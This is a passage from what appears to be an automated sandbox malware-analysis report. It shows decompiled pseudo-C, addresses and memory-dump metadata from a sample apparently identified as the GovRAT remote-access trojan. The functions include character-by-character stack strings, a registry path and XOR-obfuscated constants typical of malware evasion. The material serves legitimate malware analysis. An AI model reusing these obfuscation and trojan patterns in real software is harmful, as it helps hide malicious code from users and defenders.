    				 *((short*)(_t209 - 0x9a)) = 0x15f;
    				 *((short*)(_t209 - 0x9c)) = 0x148;
    				 *((short*)(_t209 - 0x9e)) = 0x145;
    				 *((short*)(_t209 - 0xa0)) = 0x17a;
    				 *((short*)(_t209 - 0xa2)) = 0x10d;
    				 *((short*)(_t209 - 0xa4)) = 0x148;
    				 *((short*)(_t209 - 0xa6)) = 0x14e;
    				 *((short*)(_t209 - 0xa8)) = 0x144;
    				 *((short*)(_t209 - 0xaa)) = 0x15b;
    				 *((short*)(_t209 - 0xba)) = 0x144;
    				 *((short*)(_t209 - 0xac)) = 0x15f;
    				 *((short*)(_t209 - 0xbc)) = 0x17a;
    				 *((short*)(_t209 - 0xbe)) = 0x10d;
    				 *((short*)(_t209 - 0xae)) = 0x148;
    				 *((short*)(_t209 - 0xb0)) = 0x17e;
    				 *((short*)(_t209 - 0xc0)) = 0x140;
    				 *((short*)(_t209 - 0xb2)) = 0x172;
    				 *((short*)(_t209 - 0xc6)) = 0x14b;
    				 *((short*)(_t209 - 0xce)) = 0x159;
    				 *((short*)(_t209 - 0xb4)) = 0x11f;
    				 *((short*)(_t209 - 0xd0)) = 0x14e;
    				 *((short*)(_t209 - 0xb6)) = 0x11e;
    				 *((short*)(_t209 - 0xd2)) = 0x148;
    				 *((short*)(_t209 - 0xb8)) = 0x143;
    				 *((short*)(_t209 - 0xc8)) = 0x10d;
    				 *((short*)(_t209 - 0xd8)) = 0x17e;
    				 *((intOrPtr*)(_t209 - 0x86)) = 0x17a010a;
    				 *((intOrPtr*)(_t209 - 0xc4)) = 0x142015f;
    				 *((intOrPtr*)(_t209 - 0xcc)) = 0x107010d;
    				 *((intOrPtr*)(_t209 - 0xd6)) = 0x1410148;
    				 *((char*)(_t209 - 0x3c)) = 0;
    				 *((short*)(_t209 - 0xc)) = 0x12e;
    				 *((short*)(_t209 - 0x12)) = 0x14f;
    				 *((short*)(_t209 - 0x14)) = 0x160;
    				 *((intOrPtr*)(_t209 - 0x10)) = 0x14b0143;
    				 *((char*)(_t209 - 0xa)) = 0;
    				 *0x96c228(_t209 - 0xe8);
    				if( *((intOrPtr*)(_t209 - 0xa)) != 0) {
    					L4:
    					_t140 = E0095D2FF(0,  *((intOrPtr*)(_t209 - 8)), 0x14b, L0095106C(_t209 - 0xd8), _t209 - 0x14, _t209 - 0xe8); // executed
    					if(_t140 != 0 &&  *((short*)(_t209 - 0xe8)) == 8) {
    						 *((intOrPtr*)(_t209 - 0x18)) = 1;
    					}
    					_push(_t209 - 0xe8);
    					return L009C2758(_t209 - 0xe8, 0x143);
    				}
    				_t143 = 0;
    				do {
    					 *(_t209 + _t143 * 2 - 0x14) =  *(_t209 + _t143 * 2 - 0x14) ^ 0x12e;
    					_t143 = _t143 + 1;
    				} while (_t143 < 5);
    				 *((char*)(_t209 - 0xa)) = 1;
    				goto L4;
    			}

    0x00963355
    0x0096335b
    0x00963362
    0x0096336b
    0x00963374
    0x0096337a
    0x0096337e
    0x00963385
    0x0096338c
    0x00963392
    0x0096339b
    0x009633a2
    0x009633a9
    0x009633b0
    0x009633b7
    0x009633bd
    0x009633c6
    0x009633cd
    0x009633d4
    0x009633db
    0x009633e2
    0x009633e8
    0x009633ef
    0x009633f6
    0x009633fd
    0x00963403
    0x00963409
    0x00963410
    0x00963416
    0x0096341c
    0x00963423
    0x00963429
    0x00963430
    0x00963436
    0x0096343c
    0x00963446
    0x0096344f
    0x00963458
    0x00963462
    0x0096346c
    0x00963476
    0x0096347f
    0x00963488
    0x00963491
    0x0096349d
    0x009634a6
    0x009634b0
    0x009634ba
    0x009634c3
    0x009634cc
    0x009634d6
    0x009634df
    0x009634e9
    0x009634f0
    0x009634fc
    0x00963503
    0x0096350c
    0x00963518
    0x00963522
    0x00963529
    0x00963538
    0x0096353f
    0x0096354e
    0x00963558
    0x00963562
    0x00963569
    0x00963574
    0x0096357e
    0x00963585
    0x00963591
    0x00963598
    0x009635a2
    0x009635ac
    0x009635b6
    0x009635c0
    0x009635c5
    0x009635cc
    0x009635d3
    0x009635de
    0x009635e5
    0x009635e8
    0x009635f1
    0x00963606
    0x00963620
    0x0096362a
    0x00963636
    0x00963636
    0x00963643
    0x00000000
    0x00963644
    0x009635f3
    0x009635f5
    0x009635f7
    0x009635fc
    0x009635fd
    0x00963602
    0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 63%
    			E0095D4FA(struct HINSTANCE__* __eax, void* __ebx, short __esi) {
    				short _t58;
    				short _t59;
    				short _t60;
    				short _t61;
    				short _t62;
    				short _t63;
    				short _t64;
    				short _t65;
    				short _t66;
    				short _t67;
    				short _t69;
    				short _t70;
    				short _t71;
    				short _t78;
    				short _t80;
    				short _t81;
    				short _t82;
    				short _t84;
    				short _t85;
    				short _t86;
    				short _t88;
    				short _t90;
    				short _t91;
    				short _t93;
    				short _t94;
    				short _t95;
    				short _t98;
    				short _t99;
    				short _t100;
    				short _t101;
    				short _t103;
    				short _t104;
    				short _t105;
    				short _t106;
    				short _t109;
    				void* _t112;
    
    				GetProcAddress(__eax, ??); // executed
    				_t58 = 0x53;
    				 *((short*)(_t112 - 0x144)) = _t58;
    				_t59 = 0x4f;
    				 *((short*)(_t112 - 0x142)) = _t59;
    				_t60 = 0x46;
    				 *((short*)(_t112 - 0x140)) = _t60;
    				_t61 = 0x54;
    				 *((short*)(_t112 - 0x13e)) = _t61;
    				_t62 = 0x57;
    				 *((short*)(_t112 - 0x13c)) = _t62;
    				_t63 = 0x41;
    				 *((short*)(_t112 - 0x13a)) = _t63;
    				_t64 = 0x52;
    				 *((short*)(_t112 - 0x138)) = _t64;
    				_t65 = 0x45;
    				 *((short*)(_t112 - 0x136)) = _t65;
    				_t66 = 0x5c;
    				 *((short*)(_t112 - 0x134)) = _t66;
    				_t78 = 0x4d;
    				 *((short*)(_t112 - 0x132)) = _t78;
    				 *((short*)(_t112 - 0x130)) = __esi;
    				_t80 = 0x63;
    				 *((short*)(_t112 - 0x12e)) = _t80;
    				_t81 = 0x72;
    				 *((short*)(_t112 - 0x12c)) = _t81;
    				_t82 = 0x6f;
    				 *((short*)(_t112 - 0x12a)) = _t82;
    				_t91 = 0x73;
    				 *((short*)(_t112 - 0x128)) = _t91;
    				_t84 = 0x6f;
    				 *((short*)(_t112 - 0x126)) = _t84;
    				_t85 = 0x66;
    				 *((short*)(_t112 - 0x124)) = _t85;
    				_t86 = 0x74;
    				 *((short*)(_t112 - 0x122)) = _t86;
    				 *((short*)(_t112 - 0x120)) = _t66;
    				_t88 = 0x57;
    				 *((short*)(_t112 - 0x11e)) = _t88;
    				 *((short*)(_t112 - 0x11c)) = __esi;
    				_t90 = 0x6e;
    				 *((short*)(_t112 - 0x11a)) = _t90;
    				_t93 = 0x64;
    				 *((short*)(_t112 - 0x118)) = _t93;
    				_t94 = 0x6f;
    				 *((short*)(_t112 - 0x116)) = _t94;
    				_t95 = 0x77;
    				 *((short*)(_t112 - 0x114)) = _t95;
    				 *((short*)(_t112 - 0x112)) = _t91;
    				 *((short*)(_t112 - 0x110)) = _t66;
    				_t98 = 0x43;
    				 *((short*)(_t112 - 0x10e)) = _t98;
    				_t99 = 0x75;
    				 *((short*)(_t112 - 0x10c)) = _t99;
    				_t100 = 0x72;
    				 *((short*)(_t112 - 0x10a)) = _t100;
    				 *((short*)(_t112 - 0x108)) = _t100;
    				_t101 = 0x65;
    				 *((short*)(_t112 - 0x106)) = _t101;
    				 *((short*)(_t112 - 0x104)) = _t90;
    				_t103 = 0x74;
    				 *((short*)(_t112 - 0x102)) = _t103;
    				_t104 = 0x56;
    				 *((short*)(_t112 - 0x100)) = _t104;
    				_t105 = 0x65;
    				 *((short*)(_t112 - 0xfe)) = _t105;
    				_t106 = 0x72;
    				 *((short*)(_t112 - 0xfc)) = _t106;
    				 *((short*)(_t112 - 0xfa)) = _t91;
    				 *((short*)(_t112 - 0xf8)) = __esi;
    				_t109 = 0x6f;
    				 *((short*)(_t112 - 0xf2)) = _t66;
    				_t67 = 0x55;
    				 *((short*)(_t112 - 0xf6)) = _t109;
    				 *((short*)(_t112 - 0xf0)) = _t67;
    				 *((short*)(_t112 - 0xf4)) = _t90;
    				 *((short*)(_t112 - 0xee)) = _t90;
    				 *((short*)(_t112 - 0xec)) = __esi;
    				 *((short*)(_t112 - 0xea)) = _t90;
    				 *((short*)(_t112 - 0xe8)) = _t91;
    				_t69 = 0x74;
    				 *((short*)(_t112 - 0xe6)) = _t69;
    				_t70 = 0x61;
    				 *((short*)(_t112 - 0xe4)) = _t70;
    				_t71 = 0x6c;
    				 *((short*)(_t112 - 0xe2)) = _t71;
    				 *((short*)(_t112 - 0xe0)) = _t71;
    				 *((short*)(_t112 - 0xde)) = 0;
    				_push(_t112 - 0x2c);
    				_push( *((intOrPtr*)(_t112 - 0x28)));
    				_push(_t112 - 0x144);
    				_push(0x80000002);
    				return L00A084D3(_t112 - 0x144, _t91);
    			}

    0x0095d4fb
    0x0095d503
    0x0095d506
    0x0095d50d
    0x0095d510
    0x0095d517
    0x0095d51a
    0x0095d521
    0x0095d524
    0x0095d52b
    0x0095d52e
    0x0095d535
    0x0095d538
    0x0095d53f
    0x0095d542
    0x0095d549
    0x0095d54c
    0x0095d553
    0x0095d558
    0x0095d55f
    0x0095d560
    0x0095d56b
    0x0095d572
    0x0095d575
    0x0095d57c
    0x0095d57f
    0x0095d586
    0x0095d587
    0x0095d590
    0x0095d595
    0x0095d59c
    0x0095d59f
    0x0095d5a6
    0x0095d5a9
    0x0095d5b0
    0x0095d5b3
    0x0095d5bc
    0x0095d5c3
    0x0095d5c6
    0x0095d5cf
    0x0095d5d6
    0x0095d5db
    0x0095d5e2
    0x0095d5e5
    0x0095d5ec
    0x0095d5ef
    0x0095d5f6
    0x0095d5f7
    0x0095d602
    0x0095d60b
    0x0095d612
    0x0095d615
    0x0095d61c
    0x0095d61f
    0x0095d626
    0x0095d629
    0x0095d630
    0x0095d637
    0x0095d638
    0x0095d643
    0x0095d64a
    0x0095d64d
    0x0095d654
    0x0095d657
    0x0095d65e
    0x0095d661
    0x0095d668
    0x0095d669
    0x0095d672
    0x0095d67d
    0x0095d684
    0x0095d685
    0x0095d68e
    0x0095d68f
    0x0095d696
    0x0095d6a1
    0x0095d6a8
    0x0095d6af
    0x0095d6b6
    0x0095d6bd
    0x0095d6c6
    0x0095d6c9
    0x0095d6d0
    0x0095d6d3
    0x0095d6da
    0x0095d6db
    0x0095d6e2
    0x0095d6eb
    0x0095d6f5
    0x0095d6f6
    0x0095d700
    0x0095d701
    0x0095d70b

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 19%
    			E009523B5(void* __edi, void* __esi, intOrPtr _a4) {
    				void* _t3;
    				intOrPtr* _t9;
    				void* _t14;
    				void* _t19;
    				intOrPtr* _t20;
    				void* _t22;
    
    				_t22 = __esi;
    				_t19 = __edi;
    				_t25 =  *0x9708d4;
    				if( *0x9708d4 != 0 && L00958900(_t25, 0x9708d4) != 0) {
    					 *0x9708d4(_a4);
    				}
    				L0095883E(_t19, _t22);
    				_t3 = L00952391(0x96c2f4, 0x96c30c); // executed
    				_pop(_t14);
    				_t27 = _t3;
    				if(_t3 == 0) {
    					_push(_t22);
    					_push(_t19);
    					E00958827(_t14, _t27, 0x95802d); // executed
    					_t20 = 0x96c2e4;
    					if(0x96c2e4 >= 0x96c2f0) {
    						L8:
    						_t31 =  *0x976b30;
    						if( *0x976b30 != 0 && L00958900(_t31, 0x976b30) != 0) {
    							 *0x976b30(0, 2, 0);
    						}
    						return 0;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						_t9 =  *_t20;
    						if(_t9 != 0) {
    							 *_t9();
    						}
    						_t20 = _t20 + 4;
    					} while (_t20 < 0x96c2f0);
    					goto L8;
    				}
    				return _t3;
    			}

    0x009523b5
    0x009523b5
    0x009523ba
    0x009523c1
    0x009523d5
    0x009523db
    0x009523dc
    0x009523eb
    0x009523f1
    0x009523f2
    0x009523f4
    0x009523f6
    0x009523f7
    0x009523fd
    0x0095240d
    0x00952411
    0x00952422
    0x00952422
    0x0095242b
    0x00952442
    0x00952442
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00952413
    0x00952413
    0x00952413
    0x00952417
    0x00952419
    0x00952419
    0x0095241b
    0x0095241e
    0x00000000
    0x00952413
    0x0095244b

    APIs
    • __initterm_e.LIBCMT ref: 009523EB
      • Part of subcall function 00958900: __FindPESection.LIBCMT ref: 0095895B
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • SHParseDisplayName.SHELL32(?,00000000,?,20000000,00000000), ref: 00961F09
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 100%
    			E00961F30(void* __eax, void* __edi, intOrPtr _a4, intOrPtr _a8) {
    				void* _t7;
    				char _t9;
    				void* _t10;
    				void* _t11;
    				void* _t15;
    
    				_t10 = __edi;
    				_t11 = __eax - 1;
    				_t9 = 0;
    				_t7 = E00951AE5(__edi, _t11, _a4, _a8); // executed
    				if(_t7 < 0) {
    					L4:
    					 *((char*)(_t11 + _t10)) = _t9;
    					_t9 = 0x8007007a; // HRESULT for ERROR_INSUFFICIENT_BUFFER (Win32 error 122)
    					L5:
    					return _t9;
    				}
    				_t15 = _t7 - _t11;
    				if(_t15 > 0) {
    					goto L4;
    				}
    				if(_t15 == 0) {
    					 *((char*)(_t11 + __edi)) = 0;
    				}
    				goto L5;
    			}
    Addresses: 0x00961f30 0x00961f36 0x00961f3d 0x00961f41 0x00961f4b 0x00961f58 0x00961f58 0x00961f5b 0x00961f61 0x00961f64 0x00961f64 0x00961f4d 0x00961f4f 0x00000000 0x00000000 0x00961f51 0x00961f53 0x00961f53 0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 91%
    			E0095E466(char __eax, intOrPtr _a4, intOrPtr _a8) {
    				char _t5;
    				void* _t6;
    				intOrPtr _t9;
    				void* _t10;
    
    				_t5 = __eax;
    				_t9 = 0;
    				_t10 =  *0x972f18 - _t9; // 0x0
    				if(_t10 != 0) {
    					_push(__eax); // executed
    					_t6 = L009E6C07(); // executed
    					_t5 = L00951D3E(_t6);
    					 *0x972f18 = 0;
    				}
    				if(_a8 > _t9) {
    					do {
    						_t5 = L00951D50();
    						 *((char*)(_t9 + _a4)) = _t5;
    						_t9 = _t9 + 1;
    					} while (_t9 < _a8);
    				}
    				return _t5;
    			}
    Addresses: 0x0095e466 0x0095e467 0x0095e469 0x0095e46f 0x0095e471 0x0095e472 0x0095e478 0x0095e47e 0x0095e47e 0x0095e488 0x0095e48a 0x0095e48a 0x0095e493 0x0095e496 0x0095e497 0x0095e48a 0x0095e49e

    APIs
    • _rand.LIBCMT ref: 0095E48A
      • Part of subcall function 00951D50: __getptd.LIBCMT ref: 00951D50
      • Part of subcall function 00951D3E: __getptd.LIBCMT ref: 00951D43
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    APIs
    • ExitProcess.KERNEL32(?,?,?,?), ref: 00960507
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 80%
    			E009603C5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
    				char _v7;
    				intOrPtr _v11;
    				intOrPtr _v15;
    				intOrPtr _v19;
    				intOrPtr _v23;
    				intOrPtr _v27;
    				intOrPtr _v31;
    				intOrPtr _v35;
    				intOrPtr _v39;
    				intOrPtr _v43;
    				intOrPtr _v47;
    				intOrPtr _v51;
    				intOrPtr _v55;
    				intOrPtr _v59;
    				intOrPtr _v63;
    				intOrPtr _v67;
    				char _v68;
    				char _v594;
    				char _v596;
    				char _v1114;
    				char _v1116;
    				char _v2156;
    				intOrPtr _t36;
    				short _t38;
    				void* _t65;
    				intOrPtr _t67;
    				void* _t70;
    				void* _t71;
    				void* _t72;
    				void* _t73;
    				intOrPtr _t85;
    
    				_t73 = __esi;
    				_t72 = __edi;
    				_t71 = __edx;
    				_t70 = __ecx;
    				_t36 =  *0x9759a8; // 0x41ae60
    				_push(__ebx);
    				_v11 = 0x86a4d5a3;
    				_v15 = 0xa4a6b8a6;
    				_v19 = 0xbda6e9ee;
    				_v23 = 0xe5e38c8b;
    				_v27 = 0xe2a6e9f2;
    				_v31 = 0xe9e1a6a4;
    				_v35 = 0xa3a4a6f5;
    				_v39 = 0xf2f5effe;
    				_v43 = 0xe3a6e0ef;
    				_v47 = 0x8c8ba4d5;
    				_v51 = 0xa3a4a6ea;
    				_v55 = 0xe3e28c8b;
    				_v59 = 0xe2bc8c8b;
    				_v63 = 0xe0e0e9a6;
    				_v67 = 0xe9eee5e3;
    				_v68 = 0xc6;
    				_v7 = 0;
    				if(_t36 != 0) {
    					_t65 =  *(_t36 + 8);
    					if(_t65 != 0) {
    						CloseHandle(_t65);
    						_t67 =  *0x9759a8; // 0x41ae60
    						 *((intOrPtr*)(_t67 + 8)) = 0;
    					}
    				}
    				_t85 =  *0x9759a4; // 0x0
    				if(_t85 == 0) {
    					_t38 = E009602B6(0x974f18, __eflags);
    					__eflags = _t38;
    					if(_t38 == 0) {
    						_v596 = _t38;
    						L00958BA0( &_v594, 0, 0x206);
    						L009601FD(__eflags,  &_v596); // executed
    						_push( &_v596);
    						return L0098B346( &_v596, _t71, _t72);
    					}
    					_push(_t73);
    					_push(_t72);
    					_push( &_v2156);
    					L00962167(_t70, _t71, _t72, _t73);
    					_v1116 = 0;
    					L00958BA0( &_v1114, 0, 0x206);
    					__eflags = 0;
    					_v596 = 0;
    					L00958BA0( &_v594, 0, 0x206);
    					_push( &_v596);
    					_push( &_v1116);
    					_push( &_v2156);
    					return L00A14979(L0095FB70(0, _t72, 0x206));
    				} else {
    					_v596 = 0;
    					L00958BA0( &_v594, 0, 0x206);
    					L009601FD(0,  &_v596);
    					_push( &_v596);
    					return L00A16901( &_v596);
    				}
    			}
    Addresses: 0x009603c5 0x009603c5 0x009603c5 0x009603c5 0x009603ce 0x009603d3 0x009603d6 0x009603dd 0x009603e4 0x009603eb 0x009603f2 0x009603f9 0x00960400 0x00960407 0x0096040e 0x00960415 0x0096041c 0x00960423 0x0096042a 0x00960431 0x00960438 0x0096043f 0x00960443 0x00960448 0x0096044a 0x0096044f 0x00960452 0x00960458 0x0096045d 0x0096045d 0x0096044f 0x00960460 0x00960466 0x009604bf 0x009604c4 0x009604c6 0x009604cd 0x009604dc 0x009604e8 0x009604f6 0x00000000 0x009604f7 0x0096050d 0x0096050e 0x00960515 0x00960516 0x00960523 0x00960532 0x00960537 0x0096053a 0x00960549 0x00960557 0x0096055e 0x00960565 0x00960573 0x00960468 0x0096046f 0x0096047e 0x0096048a 0x00960498 0x0096049e 0x0096049e 0x00000000

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 54%
    			E009617BC(void* __ebx, void* __esi, intOrPtr __fp0) {
    				signed int _t19;
    				void* _t27;
    				void* _t28;
    				intOrPtr _t33;
    
    				_t33 = __fp0;
    				_t27 = __esi;
    				_t19 =  *(_t28 - 0xc) & 0x0000ffff;
    				if(_t19 >=  *((intOrPtr*)(__ebx + 4))) {
    					asm("fldz");
    					 *((intOrPtr*)(_t28 - 8)) = __fp0;
    					 *((intOrPtr*)(_t28 - 4)) = 0;
    					if(_t19 <= 0) {
    						L3:
    						Sleep(_t19 * 0xa); // executed
    						asm("fmulp st1, st0");
    						 *((intOrPtr*)(_t28 - 8)) = st0;
    						_push(L00968900(_t19 * 0xa,  *((intOrPtr*)(_t28 - 8))));
    						_push( *(_t28 - 0xc) & 0x0000ffff);
    						_push(_t27);
    						_push( *((intOrPtr*)(_t28 + 8)));
    						return L009E7FAC( *(_t28 - 0xc) & 0x0000ffff);
    					} else {
    						goto L2;
    					}
    					do {
    						L2:
    						asm("fild dword [ebp-0x4]");
    						 *((intOrPtr*)(_t28 - 4)) =  *((intOrPtr*)(_t28 - 4)) + 1;
    						_t33 = _t33 +  *((intOrPtr*)(_t28 - 8));
    						 *((intOrPtr*)(_t28 - 8)) = _t33;
    					} while ( *((intOrPtr*)(_t28 - 4)) < _t19);
    					goto L3;
    				}
    				_push( *((intOrPtr*)(_t28 + 0x14)));
    				_push( *((intOrPtr*)(_t28 + 0x10)));
    				_push( *((intOrPtr*)(_t28 + 0xc)));
    				_push( *((intOrPtr*)(_t28 + 8)));
    				return L00986584(_t19);
    			}
    Addresses: 0x009617bc 0x009617bc 0x009617bc 0x009617c3 0x009617c5 0x009617c9 0x009617cc 0x009617d1 0x009617e4 0x009617e8 0x009617f3 0x009617f5 0x00961800 0x00961805 0x00961806 0x00961807 0x00000000 0x00000000 0x00000000 0x00000000 0x009617d3 0x009617d3 0x009617d3 0x009617d6 0x009617d9 0x009617dc 0x009617df 0x00000000 0x009617d3 0x00961810 0x00961813 0x00961816 0x00961819 0x00961821

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 100%
    			E00958FD6(intOrPtr _a4, intOrPtr _a8) {
    				void* _t4;
    				long _t6;
    				void* _t7;
    				long _t8;
    				void* _t9;
    				void* _t12;
    				void* _t13;
    
    				_t8 = 0;
    				while(1) {
    					_t4 = E0095B2AC(_a4, _a8, 0); // executed
    					_t7 = _t4;
    					_t9 = _t9 + 0xc;
    					if(_t7 != 0) {
    						break;
    					}
    					_t12 =  *0x973b84 - _t4; // 0x0
    					if(_t12 > 0) {
    						Sleep(_t8);
    						_t6 = _t8 + 0x3e8; // retry delay grows by 1000 ms (0x3e8) per iteration
    						_t13 = _t6 -  *0x973b84; // 0x0
    						if(_t13 > 0) {
    							_t6 = _t6 | 0xffffffff;
    						}
    						_t8 = _t6;
    						if(_t6 != 0xffffffff) {
    							continue;
    						}
    					}
    					break;
    				}
    				return _t7;
    			}
    Addresses: 0x00958fdd 0x00958fdf 0x00958fe7 0x00958fec 0x00958fee 0x00958ff3 0x00000000 0x00000000 0x00958ff5 0x00958ffb 0x00958ffe 0x00959004 0x00959004 0x0095900a 0x00959010 0x00959012 0x00959012 0x00959015 0x0095901a 0x00000000 0x00000000 0x0095901a 0x00000000 0x00958ffb 0x00959021

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd
    C-Code - Quality: 91%
    			E0095E5EB(void* __eax, void* __ebx) {
    				void* __esi;
    				intOrPtr _t12;
    				intOrPtr* _t13;
    				void* _t15;
    				void* _t19;
    				void* _t21;
    				void* _t22;
    				intOrPtr _t23;
    				void* _t25;
    				void* _t27;
    
    				if(__eax != 0) {
    					_t13 =  *((intOrPtr*)(_t27 - 0xc));
    					_t21 = _t13 + 1;
    					do {
    						_t23 =  *_t13;
    						_t13 = _t13 + 1;
    					} while (_t23 != __ebx);
    					_t15 = E0095E526( *((intOrPtr*)(_t27 + 8)),  *((intOrPtr*)(_t27 - 0xc)), _t13 - _t21); // executed
    					_push( *((intOrPtr*)(_t27 - 0xc)));
    					 *((intOrPtr*)(_t27 - 0x10)) = 1;
    					return L00A0AD11(_t15, __ebx);
    				}
    				E0095115B(_t19, _t22, _t25, _t25);
    				CloseHandle( *(_t27 - 8));
    				_t12 =  *((intOrPtr*)(_t27 - 0x10));
    				return _t12;
    			}
    Addresses: 0x0095e5ed 0x0095e5ef 0x0095e5f2 0x0095e5f5 0x0095e5f5 0x0095e5f7 0x0095e5f8 0x0095e605 0x0095e60d 0x0095e610 0x00000000 0x0095e617 0x0095e61e 0x0095e627 0x0095e62e 0x0095e634

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
